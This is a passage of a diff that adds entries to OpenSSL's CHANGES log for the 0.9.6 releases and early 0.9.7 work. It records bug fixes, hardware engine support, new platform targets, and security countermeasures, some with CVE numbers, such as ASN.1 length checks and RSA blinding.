+  *) Make DSO load along a path given through an environment variable
+     (SHLIB_PATH) with shl_load().
+     [Richard Levitte]
+
+  *) Constify the ENGINE code as a result of BIGNUM constification.
+     Also constify the RSA code and most things related to it.  In a
+     few places, most notable in the depth of the ASN.1 code, ugly
+     casts back to non-const were required (to be solved at a later
+     time)
+     [Richard Levitte]
+
+  *) Make it so the openssl application has all engines loaded by default.
+     [Richard Levitte]
+
+  *) Constify the BIGNUM routines a little more.
+     [Richard Levitte]
+
+  *) Add the following functions:
+
+	ENGINE_load_cswift()
+	ENGINE_load_chil()
+	ENGINE_load_atalla()
+	ENGINE_load_nuron()
+	ENGINE_load_builtin_engines()
+
+     That way, an application can itself choose if external engines that
+     are built-in in OpenSSL shall ever be used or not.  The benefit is
+     that applications won't have to be linked with libdl or other dso
+     libraries unless it's really needed.
+
+     Changed 'openssl engine' to load all engines on demand.
+     Changed the engine header files to avoid the duplication of some
+     declarations (they differed!).
+     [Richard Levitte]
+
+  *) 'openssl engine' can now list capabilities.
+     [Richard Levitte]
+
+  *) Better error reporting in 'openssl engine'.
+     [Richard Levitte]
+
+  *) Never call load_dh_param(NULL) in s_server.
+     [Bodo Moeller]
+
+  *) Add engine application.  It can currently list engines by name and
+     identity, and test if they are actually available.
+     [Richard Levitte]
+
+  *) Improve RPM specification file by forcing symbolic linking and making
+     sure the installed documentation is also owned by root.root.
+     [Damien Miller <djm@mindrot.org>]
+
+  *) Give the OpenSSL applications more possibilities to make use of
+     keys (public as well as private) handled by engines.
+     [Richard Levitte]
+
+  *) Add OCSP code that comes from CertCo.
+     [Richard Levitte]
+
+  *) Add VMS support for the Rijndael code.
+     [Richard Levitte]
+
+  *) Added untested support for Nuron crypto accelerator.
+     [Ben Laurie]
+
+  *) Add support for external cryptographic devices.  This code was
+     previously distributed separately as the "engine" branch.
+     [Geoff Thorpe, Richard Levitte]
+
+  *) Rework the filename-translation in the DSO code. It is now possible to
+     have far greater control over how a "name" is turned into a filename
+     depending on the operating environment and any oddities about the
+     different shared library filenames on each system.
+     [Geoff Thorpe]
+
+  *) Support threads on FreeBSD-elf in Configure.
+     [Richard Levitte]
+
+  *) Fix for SHA1 assembly problem with MASM: it produces
+     warnings about corrupt line number information when assembling
+     with debugging information. This is caused by the overlapping
+     of two sections.
+     [Bernd Matthes <mainbug@celocom.de>, Steve Henson]
+
+  *) NCONF changes.
+     NCONF_get_number() has no error checking at all.  As a replacement,
+     NCONF_get_number_e() is defined (_e for "error checking") and is
+     promoted strongly.  The old NCONF_get_number is kept around for
+     binary backward compatibility.
+     Make it possible for methods to load from something other than a BIO,
+     by providing a function pointer that is given a name instead of a BIO.
+     For example, this could be used to load configuration data from an
+     LDAP server.
+     [Richard Levitte]
+
+  *) Fix for non blocking accept BIOs. Added new I/O special reason
+     BIO_RR_ACCEPT to cover this case. Previously use of accept BIOs
+     with non blocking I/O was not possible because no retry code was
+     implemented. Also added new SSL code SSL_WANT_ACCEPT to cover
+     this case.
+     [Steve Henson]
+
+  *) Added the beginnings of Rijndael support.
+     [Ben Laurie]
+
+  *) Fix for bug in DirectoryString mask setting. Add support for
+     X509_NAME_print_ex() in 'req' and X509_print_ex() function
+     to allow certificate printing to more controllable, additional
+     'certopt' option to 'x509' to allow new printing options to be
+     set.
+     [Steve Henson]
+
+  *) Clean old EAY MD5 hack from e_os.h.
+     [Richard Levitte]
+
+ Changes between 0.9.6l and 0.9.6m  [17 Mar 2004]
+
+  *) Fix null-pointer assignment in do_change_cipher_spec() revealed
+     by using the Codenomicon TLS Test Tool (CVE-2004-0079)
+     [Joe Orton, Steve Henson]
+
+ Changes between 0.9.6k and 0.9.6l  [04 Nov 2003]
+
+  *) Fix additional bug revealed by the NISCC test suite:
+
+     Stop bug triggering large recursion when presented with
+     certain ASN.1 tags (CVE-2003-0851)
+     [Steve Henson]
+
+ Changes between 0.9.6j and 0.9.6k  [30 Sep 2003]
+
+  *) Fix various bugs revealed by running the NISCC test suite:
+
+     Stop out of bounds reads in the ASN1 code when presented with
+     invalid tags (CVE-2003-0543 and CVE-2003-0544).
+     
+     If verify callback ignores invalid public key errors don't try to check
+     certificate signature with the NULL public key.
+
+     [Steve Henson]
+
+  *) In ssl3_accept() (ssl/s3_srvr.c) only accept a client certificate
+     if the server requested one: as stated in TLS 1.0 and SSL 3.0
+     specifications.
+     [Steve Henson]
+
+  *) In ssl3_get_client_hello() (ssl/s3_srvr.c), tolerate additional
+     extra data after the compression methods not only for TLS 1.0
+     but also for SSL 3.0 (as required by the specification).
+     [Bodo Moeller; problem pointed out by Matthias Loepfe]
+
+  *) Change X509_certificate_type() to mark the key as exported/exportable
+     when it's 512 *bits* long, not 512 bytes.
+     [Richard Levitte]
+
+ Changes between 0.9.6i and 0.9.6j  [10 Apr 2003]
+
+  *) Countermeasure against the Klima-Pokorny-Rosa extension of
+     Bleichbacher's attack on PKCS #1 v1.5 padding: treat
+     a protocol version number mismatch like a decryption error
+     in ssl3_get_client_key_exchange (ssl/s3_srvr.c).
+     [Bodo Moeller]
+
+  *) Turn on RSA blinding by default in the default implementation
+     to avoid a timing attack. Applications that don't want it can call
+     RSA_blinding_off() or use the new flag RSA_FLAG_NO_BLINDING.
+     They would be ill-advised to do so in most cases.
+     [Ben Laurie, Steve Henson, Geoff Thorpe, Bodo Moeller]
+
+  *) Change RSA blinding code so that it works when the PRNG is not
+     seeded (in this case, the secret RSA exponent is abused as
+     an unpredictable seed -- if it is not unpredictable, there
+     is no point in blinding anyway).  Make RSA blinding thread-safe
+     by remembering the creator's thread ID in rsa->blinding and
+     having all other threads use local one-time blinding factors
+     (this requires more computation than sharing rsa->blinding, but
+     avoids excessive locking; and if an RSA object is not shared
+     between threads, blinding will still be very fast).
+     [Bodo Moeller]
+
+ Changes between 0.9.6h and 0.9.6i  [19 Feb 2003]
+
+  *) In ssl3_get_record (ssl/s3_pkt.c), minimize information leaked
+     via timing by performing a MAC computation even if incorrrect
+     block cipher padding has been found.  This is a countermeasure
+     against active attacks where the attacker has to distinguish
+     between bad padding and a MAC verification error. (CVE-2003-0078)
+
+     [Bodo Moeller; problem pointed out by Brice Canvel (EPFL),
+     Alain Hiltgen (UBS), Serge Vaudenay (EPFL), and
+     Martin Vuagnoux (EPFL, Ilion)]
+
+ Changes between 0.9.6g and 0.9.6h  [5 Dec 2002]
+
+  *) New function OPENSSL_cleanse(), which is used to cleanse a section of
+     memory from it's contents.  This is done with a counter that will
+     place alternating values in each byte.  This can be used to solve
+     two issues: 1) the removal of calls to memset() by highly optimizing
+     compilers, and 2) cleansing with other values than 0, since those can
+     be read through on certain media, for example a swap space on disk.
+     [Geoff Thorpe]
+
+  *) Bugfix: client side session caching did not work with external caching,
+     because the session->cipher setting was not restored when reloading
+     from the external cache. This problem was masked, when
+     SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG (part of SSL_OP_ALL) was set.
+     (Found by Steve Haslam <steve@araqnid.ddts.net>.)
+     [Lutz Jaenicke]
+
+  *) Fix client_certificate (ssl/s2_clnt.c): The permissible total
+     length of the REQUEST-CERTIFICATE message is 18 .. 34, not 17 .. 33.
+     [Zeev Lieber <zeev-l@yahoo.com>]
+
+  *) Undo an undocumented change introduced in 0.9.6e which caused
+     repeated calls to OpenSSL_add_all_ciphers() and 
+     OpenSSL_add_all_digests() to be ignored, even after calling
+     EVP_cleanup().
+     [Richard Levitte]
+
+  *) Change the default configuration reader to deal with last line not
+     being properly terminated.
+     [Richard Levitte]
+
+  *) Change X509_NAME_cmp() so it applies the special rules on handling
+     DN values that are of type PrintableString, as well as RDNs of type
+     emailAddress where the value has the type ia5String.
+     [stefank@valicert.com via Richard Levitte]
+
+  *) Add a SSL_SESS_CACHE_NO_INTERNAL_STORE flag to take over half
+     the job SSL_SESS_CACHE_NO_INTERNAL_LOOKUP was inconsistently
+     doing, define a new flag (SSL_SESS_CACHE_NO_INTERNAL) to be
+     the bitwise-OR of the two for use by the majority of applications
+     wanting this behaviour, and update the docs. The documented
+     behaviour and actual behaviour were inconsistent and had been
+     changing anyway, so this is more a bug-fix than a behavioural
+     change.
+     [Geoff Thorpe, diagnosed by Nadav Har'El]
+
+  *) Don't impose a 16-byte length minimum on session IDs in ssl/s3_clnt.c
+     (the SSL 3.0 and TLS 1.0 specifications allow any length up to 32 bytes).
+     [Bodo Moeller]
+
+  *) Fix initialization code race conditions in
+        SSLv23_method(),  SSLv23_client_method(),   SSLv23_server_method(),
+        SSLv2_method(),   SSLv2_client_method(),    SSLv2_server_method(),
+        SSLv3_method(),   SSLv3_client_method(),    SSLv3_server_method(),
+        TLSv1_method(),   TLSv1_client_method(),    TLSv1_server_method(),
+        ssl2_get_cipher_by_char(),
+        ssl3_get_cipher_by_char().
+     [Patrick McCormick <patrick@tellme.com>, Bodo Moeller]
+
+  *) Reorder cleanup sequence in SSL_CTX_free(): only remove the ex_data after
+     the cached sessions are flushed, as the remove_cb() might use ex_data
+     contents. Bug found by Sam Varshavchik <mrsam@courier-mta.com>
+     (see [openssl.org #212]).
+     [Geoff Thorpe, Lutz Jaenicke]
+
+  *) Fix typo in OBJ_txt2obj which incorrectly passed the content
+     length, instead of the encoding length to d2i_ASN1_OBJECT.
+     [Steve Henson]
+
+ Changes between 0.9.6f and 0.9.6g  [9 Aug 2002]
+
+  *) [In 0.9.6g-engine release:]
+     Fix crypto/engine/vendor_defns/cswift.h for WIN32 (use '_stdcall').
+     [Lynn Gazis <lgazis@rainbow.com>]
+
+ Changes between 0.9.6e and 0.9.6f  [8 Aug 2002]
+
+  *) Fix ASN1 checks. Check for overflow by comparing with LONG_MAX
+     and get fix the header length calculation.
+     [Florian Weimer <Weimer@CERT.Uni-Stuttgart.DE>,
+	Alon Kantor <alonk@checkpoint.com> (and others),
+	Steve Henson]
+
+  *) Use proper error handling instead of 'assertions' in buffer
+     overflow checks added in 0.9.6e.  This prevents DoS (the
+     assertions could call abort()).
+     [Arne Ansper <arne@ats.cyber.ee>, Bodo Moeller]
+
+ Changes between 0.9.6d and 0.9.6e  [30 Jul 2002]
+
+  *) Add various sanity checks to asn1_get_length() to reject
+     the ASN1 length bytes if they exceed sizeof(long), will appear
+     negative or the content length exceeds the length of the
+     supplied buffer.
+     [Steve Henson, Adi Stav <stav@mercury.co.il>, James Yonan <jim@ntlp.com>]
+
+  *) Fix cipher selection routines: ciphers without encryption had no flags
+     for the cipher strength set and where therefore not handled correctly
+     by the selection routines (PR #130).
+     [Lutz Jaenicke]
+
+  *) Fix EVP_dsa_sha macro.
+     [Nils Larsch]
+
+  *) New option
+          SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS
+     for disabling the SSL 3.0/TLS 1.0 CBC vulnerability countermeasure
+     that was added in OpenSSL 0.9.6d.
+
+     As the countermeasure turned out to be incompatible with some
+     broken SSL implementations, the new option is part of SSL_OP_ALL.
+     SSL_OP_ALL is usually employed when compatibility with weird SSL
+     implementations is desired (e.g. '-bugs' option to 's_client' and
+     's_server'), so the new option is automatically set in many
+     applications.
+     [Bodo Moeller]
+
+  *) Changes in security patch:
+
+     Changes marked "(CHATS)" were sponsored by the Defense Advanced
+     Research Projects Agency (DARPA) and Air Force Research Laboratory,
+     Air Force Materiel Command, USAF, under agreement number
+     F30602-01-2-0537.
+
+  *) Add various sanity checks to asn1_get_length() to reject
+     the ASN1 length bytes if they exceed sizeof(long), will appear
+     negative or the content length exceeds the length of the
+     supplied buffer. (CVE-2002-0659)
+     [Steve Henson, Adi Stav <stav@mercury.co.il>, James Yonan <jim@ntlp.com>]
+
+  *) Assertions for various potential buffer overflows, not known to
+     happen in practice.
+     [Ben Laurie (CHATS)]
+
+  *) Various temporary buffers to hold ASCII versions of integers were
+     too small for 64 bit platforms. (CVE-2002-0655)
+     [Matthew Byng-Maddick <mbm@aldigital.co.uk> and Ben Laurie (CHATS)>
+
+  *) Remote buffer overflow in SSL3 protocol - an attacker could
+     supply an oversized session ID to a client. (CVE-2002-0656)
+     [Ben Laurie (CHATS)]
+
+  *) Remote buffer overflow in SSL2 protocol - an attacker could
+     supply an oversized client master key. (CVE-2002-0656)
+     [Ben Laurie (CHATS)]
+
+ Changes between 0.9.6c and 0.9.6d  [9 May 2002]
+
+  *) Fix crypto/asn1/a_sign.c so that 'parameters' is omitted (not
+     encoded as NULL) with id-dsa-with-sha1.
+     [Nils Larsch <nla@trustcenter.de>; problem pointed out by Bodo Moeller]
+
+  *) Check various X509_...() return values in apps/req.c.
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Fix BASE64 decode (EVP_DecodeUpdate) for data with CR/LF ended lines:
+     an end-of-file condition would erronously be flagged, when the CRLF
+     was just at the end of a processed block. The bug was discovered when
+     processing data through a buffering memory BIO handing the data to a
+     BASE64-decoding BIO. Bug fund and patch submitted by Pavel Tsekov
+     <ptsekov@syntrex.com> and Nedelcho Stanev.
+     [Lutz Jaenicke]
+
+  *) Implement a countermeasure against a vulnerability recently found
+     in CBC ciphersuites in SSL 3.0/TLS 1.0: Send an empty fragment
+     before application data chunks to avoid the use of known IVs
+     with data potentially chosen by the attacker.
+     [Bodo Moeller]
+
+  *) Fix length checks in ssl3_get_client_hello().
+     [Bodo Moeller]
+
+  *) TLS/SSL library bugfix: use s->s3->in_read_app_data differently
+     to prevent ssl3_read_internal() from incorrectly assuming that
+     ssl3_read_bytes() found application data while handshake
+     processing was enabled when in fact s->s3->in_read_app_data was
+     merely automatically cleared during the initial handshake.
+     [Bodo Moeller; problem pointed out by Arne Ansper <arne@ats.cyber.ee>]
+
+  *) Fix object definitions for Private and Enterprise: they were not
+     recognized in their shortname (=lowercase) representation. Extend
+     obj_dat.pl to issue an error when using undefined keywords instead
+     of silently ignoring the problem (Svenning Sorensen
+     <sss@sss.dnsalias.net>).
+     [Lutz Jaenicke]
+
+  *) Fix DH_generate_parameters() so that it works for 'non-standard'
+     generators, i.e. generators other than 2 and 5.  (Previously, the
+     code did not properly initialise the 'add' and 'rem' values to
+     BN_generate_prime().)
+
+     In the new general case, we do not insist that 'generator' is
+     actually a primitive root: This requirement is rather pointless;
+     a generator of the order-q subgroup is just as good, if not
+     better.
+     [Bodo Moeller]
+ 
+  *) Map new X509 verification errors to alerts. Discovered and submitted by
+     Tom Wu <tom@arcot.com>.
+     [Lutz Jaenicke]
+
+  *) Fix ssl3_pending() (ssl/s3_lib.c) to prevent SSL_pending() from
+     returning non-zero before the data has been completely received
+     when using non-blocking I/O.
+     [Bodo Moeller; problem pointed out by John Hughes]
+
+  *) Some of the ciphers missed the strength entry (SSL_LOW etc).
+     [Ben Laurie, Lutz Jaenicke]
+
+  *) Fix bug in SSL_clear(): bad sessions were not removed (found by
+     Yoram Zahavi <YoramZ@gilian.com>).
+     [Lutz Jaenicke]
+
+  *) Add information about CygWin 1.3 and on, and preserve proper
+     configuration for the versions before that.
+     [Corinna Vinschen <vinschen@redhat.com> and Richard Levitte]
+
+  *) Make removal from session cache (SSL_CTX_remove_session()) more robust:
+     check whether we deal with a copy of a session and do not delete from
+     the cache in this case. Problem reported by "Izhar Shoshani Levi"
+     <izhar@checkpoint.com>.
+     [Lutz Jaenicke]
+
+  *) Do not store session data into the internal session cache, if it
+     is never intended to be looked up (SSL_SESS_CACHE_NO_INTERNAL_LOOKUP
+     flag is set). Proposed by Aslam <aslam@funk.com>.
+     [Lutz Jaenicke]
+
+  *) Have ASN1_BIT_STRING_set_bit() really clear a bit when the requested
+     value is 0.
+     [Richard Levitte]
+
+  *) [In 0.9.6d-engine release:]
+     Fix a crashbug and a logic bug in hwcrhk_load_pubkey().
+     [Toomas Kiisk <vix@cyber.ee> via Richard Levitte]
+
+  *) Add the configuration target linux-s390x.
+     [Neale Ferguson <Neale.Ferguson@SoftwareAG-USA.com> via Richard Levitte]
+
+  *) The earlier bugfix for the SSL3_ST_SW_HELLO_REQ_C case of
+     ssl3_accept (ssl/s3_srvr.c) incorrectly used a local flag
+     variable as an indication that a ClientHello message has been
+     received.  As the flag value will be lost between multiple
+     invocations of ssl3_accept when using non-blocking I/O, the
+     function may not be aware that a handshake has actually taken
+     place, thus preventing a new session from being added to the
+     session cache.
+
+     To avoid this problem, we now set s->new_session to 2 instead of
+     using a local variable.
+     [Lutz Jaenicke, Bodo Moeller]
+
+  *) Bugfix: Return -1 from ssl3_get_server_done (ssl3/s3_clnt.c)
+     if the SSL_R_LENGTH_MISMATCH error is detected.
+     [Geoff Thorpe, Bodo Moeller]
+
+  *) New 'shared_ldflag' column in Configure platform table.
+     [Richard Levitte]
+
+  *) Fix EVP_CIPHER_mode macro.
+     ["Dan S. Camper" <dan@bti.net>]
+
+  *) Fix ssl3_read_bytes (ssl/s3_pkt.c): To ignore messages of unknown
+     type, we must throw them away by setting rr->length to 0.
+     [D P Chang <dpc@qualys.com>]
+
+ Changes between 0.9.6b and 0.9.6c  [21 dec 2001]
+
+  *) Fix BN_rand_range bug pointed out by Dominikus Scherkl
+     <Dominikus.Scherkl@biodata.com>.  (The previous implementation
+     worked incorrectly for those cases where  range = 10..._2  and
+     3*range  is two bits longer than  range.)
+     [Bodo Moeller]
+
+  *) Only add signing time to PKCS7 structures if it is not already
+     present.
+     [Steve Henson]
+
+  *) Fix crypto/objects/objects.h: "ld-ce" should be "id-ce",
+     OBJ_ld_ce should be OBJ_id_ce.
+     Also some ip-pda OIDs in crypto/objects/objects.txt were
+     incorrect (cf. RFC 3039).
+     [Matt Cooper, Frederic Giudicelli, Bodo Moeller]
+
+  *) Release CRYPTO_LOCK_DYNLOCK when CRYPTO_destroy_dynlockid()
+     returns early because it has nothing to do.
+     [Andy Schneider <andy.schneider@bjss.co.uk>]
+
+  *) [In 0.9.6c-engine release:]
+     Fix mutex callback return values in crypto/engine/hw_ncipher.c.
+     [Andy Schneider <andy.schneider@bjss.co.uk>]
+
+  *) [In 0.9.6c-engine release:]
+     Add support for Cryptographic Appliance's keyserver technology.
+     (Use engine 'keyclient')
+     [Cryptographic Appliances and Geoff Thorpe]
+
+  *) Add a configuration entry for OS/390 Unix.  The C compiler 'c89'
+     is called via tools/c89.sh because arguments have to be
+     rearranged (all '-L' options must appear before the first object
+     modules).
+     [Richard Shapiro <rshapiro@abinitio.com>]
+
+  *) [In 0.9.6c-engine release:]
+     Add support for Broadcom crypto accelerator cards, backported
+     from 0.9.7.
+     [Broadcom, Nalin Dahyabhai <nalin@redhat.com>, Mark Cox]
+
+  *) [In 0.9.6c-engine release:]
+     Add support for SureWare crypto accelerator cards from 
+     Baltimore Technologies.  (Use engine 'sureware')
+     [Baltimore Technologies and Mark Cox]
+
+  *) [In 0.9.6c-engine release:]
+     Add support for crypto accelerator cards from Accelerated
+     Encryption Processing, www.aep.ie.  (Use engine 'aep')
+     [AEP Inc. and Mark Cox]
+
+  *) Add a configuration entry for gcc on UnixWare.
+     [Gary Benson <gbenson@redhat.com>]
+
+  *) Change ssl/s2_clnt.c and ssl/s2_srvr.c so that received handshake
+     messages are stored in a single piece (fixed-length part and
+     variable-length part combined) and fix various bugs found on the way.
+     [Bodo Moeller]
+
+  *) Disable caching in BIO_gethostbyname(), directly use gethostbyname()
+     instead.  BIO_gethostbyname() does not know what timeouts are
+     appropriate, so entries would stay in cache even when they have
+     become invalid.
+     [Bodo Moeller; problem pointed out by Rich Salz <rsalz@zolera.com>
+
+  *) Change ssl23_get_client_hello (ssl/s23_srvr.c) behaviour when
+     faced with a pathologically small ClientHello fragment that does
+     not contain client_version: Instead of aborting with an error,
+     simply choose the highest available protocol version (i.e.,
+     TLS 1.0 unless it is disabled).  In practice, ClientHello
+     messages are never sent like this, but this change gives us
+     strictly correct behaviour at least for TLS.
+     [Bodo Moeller]
+
+  *) Fix SSL handshake functions and SSL_clear() such that SSL_clear()
+     never resets s->method to s->ctx->method when called from within
+     one of the SSL handshake functions.
+     [Bodo Moeller; problem pointed out by Niko Baric]
+
+  *) In ssl3_get_client_hello (ssl/s3_srvr.c), generate a fatal alert
+     (sent using the client's version number) if client_version is
+     smaller than the protocol version in use.  Also change
+     ssl23_get_client_hello (ssl/s23_srvr.c) to select TLS 1.0 if
+     the client demanded SSL 3.0 but only TLS 1.0 is enabled; then
+     the client will at least see that alert.
+     [Bodo Moeller]
+
+  *) Fix ssl3_get_message (ssl/s3_both.c) to handle message fragmentation
+     correctly.
+     [Bodo Moeller]
+
+  *) Avoid infinite loop in ssl3_get_message (ssl/s3_both.c) if a
+     client receives HelloRequest while in a handshake.
+     [Bodo Moeller; bug noticed by Andy Schneider <andy.schneider@bjss.co.uk>]
+
+  *) Bugfix in ssl3_accept (ssl/s3_srvr.c): Case SSL3_ST_SW_HELLO_REQ_C
+     should end in 'break', not 'goto end' which circuments various
+     cleanups done in state SSL_ST_OK.   But session related stuff
+     must be disabled for SSL_ST_OK in the case that we just sent a
+     HelloRequest.
+
+     Also avoid some overhead by not calling ssl_init_wbio_buffer()
+     before just sending a HelloRequest.
+     [Bodo Moeller, Eric Rescorla <ekr@rtfm.com>]
+
+  *) Fix ssl/s3_enc.c, ssl/t1_enc.c and ssl/s3_pkt.c so that we don't
+     reveal whether illegal block cipher padding was found or a MAC
+     verification error occured.  (Neither SSLerr() codes nor alerts
+     are directly visible to potential attackers, but the information
+     may leak via logfiles.)
+
+     Similar changes are not required for the SSL 2.0 implementation
+     because the number of padding bytes is sent in clear for SSL 2.0,
+     and the extra bytes are just ignored.  However ssl/s2_pkt.c
+     failed to verify that the purported number of padding bytes is in
+     the legal range.
+     [Bodo Moeller]
+
+  *) Add OpenUNIX-8 support including shared libraries
+     (Boyd Lynn Gerber <gerberb@zenez.com>).
+     [Lutz Jaenicke]
+
+  *) Improve RSA_padding_check_PKCS1_OAEP() check again to avoid
+     'wristwatch attack' using huge encoding parameters (cf.
+     James H. Manger's CRYPTO 2001 paper).  Note that the
+     RSA_PKCS1_OAEP_PADDING case of RSA_private_decrypt() does not use
+     encoding parameters and hence was not vulnerable.
+     [Bodo Moeller]
+
+  *) BN_sqr() bug fix.
+     [Ulf Möller, reported by Jim Ellis <jim.ellis@cavium.com>]
+
+  *) Rabin-Miller test analyses assume uniformly distributed witnesses,
+     so use BN_pseudo_rand_range() instead of using BN_pseudo_rand()
+     followed by modular reduction.
+     [Bodo Moeller; pointed out by Adam Young <AYoung1@NCSUS.JNJ.COM>]
+
+  *) Add BN_pseudo_rand_range() with obvious functionality: BN_rand_range()
+     equivalent based on BN_pseudo_rand() instead of BN_rand().
+     [Bodo Moeller]
+
+  *) s3_srvr.c: allow sending of large client certificate lists (> 16 kB).
+     This function was broken, as the check for a new client hello message
+     to handle SGC did not allow these large messages.
+     (Tracked down by "Douglas E. Engert" <deengert@anl.gov>.)
+     [Lutz Jaenicke]
+
+  *) Add alert descriptions for TLSv1 to SSL_alert_desc_string[_long]().
+     [Lutz Jaenicke]
+
+  *) Fix buggy behaviour of BIO_get_num_renegotiates() and BIO_ctrl()
+     for BIO_C_GET_WRITE_BUF_SIZE ("Stephen Hinton" <shinton@netopia.com>).
+     [Lutz Jaenicke]
+
+  *) Rework the configuration and shared library support for Tru64 Unix.
+     The configuration part makes use of modern compiler features and
+     still retains old compiler behavior for those that run older versions
+     of the OS.  The shared library support part includes a variant that
+     uses the RPATH feature, and is available through the special
+     configuration target "alpha-cc-rpath", which will never be selected
+     automatically.
+     [Tim Mooney <mooney@dogbert.cc.ndsu.NoDak.edu> via Richard Levitte]
+
+  *) In ssl3_get_key_exchange (ssl/s3_clnt.c), call ssl3_get_message()
+     with the same message size as in ssl3_get_certificate_request().
+     Otherwise, if no ServerKeyExchange message occurs, CertificateRequest
+     messages might inadvertently be reject as too long.
+     [Petr Lampa <lampa@fee.vutbr.cz>]
+
+  *) Enhanced support for IA-64 Unix platforms (well, Linux and HP-UX).
+     [Andy Polyakov]
+
+  *) Modified SSL library such that the verify_callback that has been set
+     specificly for an SSL object with SSL_set_verify() is actually being
+     used. Before the change, a verify_callback set with this function was
+     ignored and the verify_callback() set in the SSL_CTX at the time of
+     the call was used. New function X509_STORE_CTX_set_verify_cb() introduced
+     to allow the necessary settings.
+     [Lutz Jaenicke]
+
+  *) Initialize static variable in crypto/dsa/dsa_lib.c and crypto/dh/dh_lib.c
+     explicitly to NULL, as at least on Solaris 8 this seems not always to be
+     done automatically (in contradiction to the requirements of the C
+     standard). This made problems when used from OpenSSH.
+     [Lutz Jaenicke]
+
+  *) In OpenSSL 0.9.6a and 0.9.6b, crypto/dh/dh_key.c ignored
+     dh->length and always used
+
+          BN_rand_range(priv_key, dh->p).
+
+     BN_rand_range() is not necessary for Diffie-Hellman, and this
+     specific range makes Diffie-Hellman unnecessarily inefficient if
+     dh->length (recommended exponent length) is much smaller than the
+     length of dh->p.  We could use BN_rand_range() if the order of
+     the subgroup was stored in the DH structure, but we only have
+     dh->length.
+
+     So switch back to
+
+          BN_rand(priv_key, l, ...)
+
+     where 'l' is dh->length if this is defined, or BN_num_bits(dh->p)-1
+     otherwise.
+     [Bodo Moeller]
+
+  *) In
+
+          RSA_eay_public_encrypt
+          RSA_eay_private_decrypt
+          RSA_eay_private_encrypt (signing)
+          RSA_eay_public_decrypt (signature verification)
+
+     (default implementations for RSA_public_encrypt,
+     RSA_private_decrypt, RSA_private_encrypt, RSA_public_decrypt),
+     always reject numbers >= n.
+     [Bodo Moeller]
+
+  *) In crypto/rand/md_rand.c, use a new short-time lock CRYPTO_LOCK_RAND2
+     to synchronize access to 'locking_thread'.  This is necessary on
+     systems where access to 'locking_thread' (an 'unsigned long'
+     variable) is not atomic.
+     [Bodo Moeller]
+
+  *) In crypto/rand/md_rand.c, set 'locking_thread' to current thread's ID
+     *before* setting the 'crypto_lock_rand' flag.  The previous code had
+     a race condition if 0 is a valid thread ID.
+     [Travis Vitek <vitek@roguewave.com>]
+
+  *) Add support for shared libraries under Irix.
+     [Albert Chin-A-Young <china@thewrittenword.com>]
+
+  *) Add configuration option to build on Linux on both big-endian and
+     little-endian MIPS.
+     [Ralf Baechle <ralf@uni-koblenz.de>]
+
+  *) Add the possibility to create shared libraries on HP-UX.
+     [Richard Levitte]
+
+ Changes between 0.9.6a and 0.9.6b  [9 Jul 2001]
+
+  *) Change ssleay_rand_bytes (crypto/rand/md_rand.c)
+     to avoid a SSLeay/OpenSSL PRNG weakness pointed out by
+     Markku-Juhani O. Saarinen <markku-juhani.saarinen@nokia.com>:
+     PRNG state recovery was possible based on the output of
+     one PRNG request appropriately sized to gain knowledge on
+     'md' followed by enough consecutive 1-byte PRNG requests
+     to traverse all of 'state'.
+
+     1. When updating 'md_local' (the current thread's copy of 'md')
+        during PRNG output generation, hash all of the previous
+        'md_local' value, not just the half used for PRNG output.
+
+     2. Make the number of bytes from 'state' included into the hash
+        independent from the number of PRNG bytes requested.
+
+     The first measure alone would be sufficient to avoid
+     Markku-Juhani's attack.  (Actually it had never occurred
+     to me that the half of 'md_local' used for chaining was the
+     half from which PRNG output bytes were taken -- I had always
+     assumed that the secret half would be used.)  The second
+     measure makes sure that additional data from 'state' is never
+     mixed into 'md_local' in small portions; this heuristically
+     further strengthens the PRNG.
+     [Bodo Moeller]
+
+  *) Fix crypto/bn/asm/mips3.s.
+     [Andy Polyakov]
+
+  *) When only the key is given to "enc", the IV is undefined. Print out
+     an error message in this case.
+     [Lutz Jaenicke]
+
+  *) Handle special case when X509_NAME is empty in X509 printing routines.
+     [Steve Henson]
+
+  *) In dsa_do_verify (crypto/dsa/dsa_ossl.c), verify that r and s are
+     positive and less than q.
+     [Bodo Moeller]
+
+  *) Don't change *pointer in CRYPTO_add_lock() is add_lock_callback is
+     used: it isn't thread safe and the add_lock_callback should handle
+     that itself.
+     [Paul Rose <Paul.Rose@bridge.com>]
+
+  *) Verify that incoming data obeys the block size in
+     ssl3_enc (ssl/s3_enc.c) and tls1_enc (ssl/t1_enc.c).
+     [Bodo Moeller]
+
+  *) Fix OAEP check.
+     [Ulf Möller, Bodo Möller]
+
+  *) The countermeasure against Bleichbacher's attack on PKCS #1 v1.5
+     RSA encryption was accidentally removed in s3_srvr.c in OpenSSL 0.9.5
+     when fixing the server behaviour for backwards-compatible 'client
+     hello' messages.  (Note that the attack is impractical against
+     SSL 3.0 and TLS 1.0 anyway because length and version checking
+     means that the probability of guessing a valid ciphertext is
+     around 2^-40; see section 5 in Bleichenbacher's CRYPTO '98
+     paper.)
+
+     Before 0.9.5, the countermeasure (hide the error by generating a
+     random 'decryption result') did not work properly because
+     ERR_clear_error() was missing, meaning that SSL_get_error() would
+     detect the supposedly ignored error.
+
+     Both problems are now fixed.
+     [Bodo Moeller]
+
+  *) In crypto/bio/bf_buff.c, increase DEFAULT_BUFFER_SIZE to 4096
+     (previously it was 1024).
+     [Bodo Moeller]
+
+  *) Fix for compatibility mode trust settings: ignore trust settings
+     unless some valid trust or reject settings are present.
+     [Steve Henson]
+
+  *) Fix for blowfish EVP: its a variable length cipher.
+     [Steve Henson]
+
+  *) Fix various bugs related to DSA S/MIME verification. Handle missing
+     parameters in DSA public key structures and return an error in the
+     DSA routines if parameters are absent.
+     [Steve Henson]
+
+  *) In versions up to 0.9.6, RAND_file_name() resorted to file ".rnd"
+     in the current directory if neither $RANDFILE nor $HOME was set.
+     RAND_file_name() in 0.9.6a returned NULL in this case.  This has
+     caused some confusion to Windows users who haven't defined $HOME.
+     Thus RAND_file_name() is changed again: e_os.h can define a
+     DEFAULT_HOME, which will be used if $HOME is not set.
+     For Windows, we use "C:"; on other platforms, we still require
+     environment variables.
+
+  *) Move 'if (!initialized) RAND_poll()' into regions protected by
+     CRYPTO_LOCK_RAND.  This is not strictly necessary, but avoids
+     having multiple threads call RAND_poll() concurrently.
+     [Bodo Moeller]
+
+  *) In crypto/rand/md_rand.c, replace 'add_do_not_lock' flag by a
+     combination of a flag and a thread ID variable.
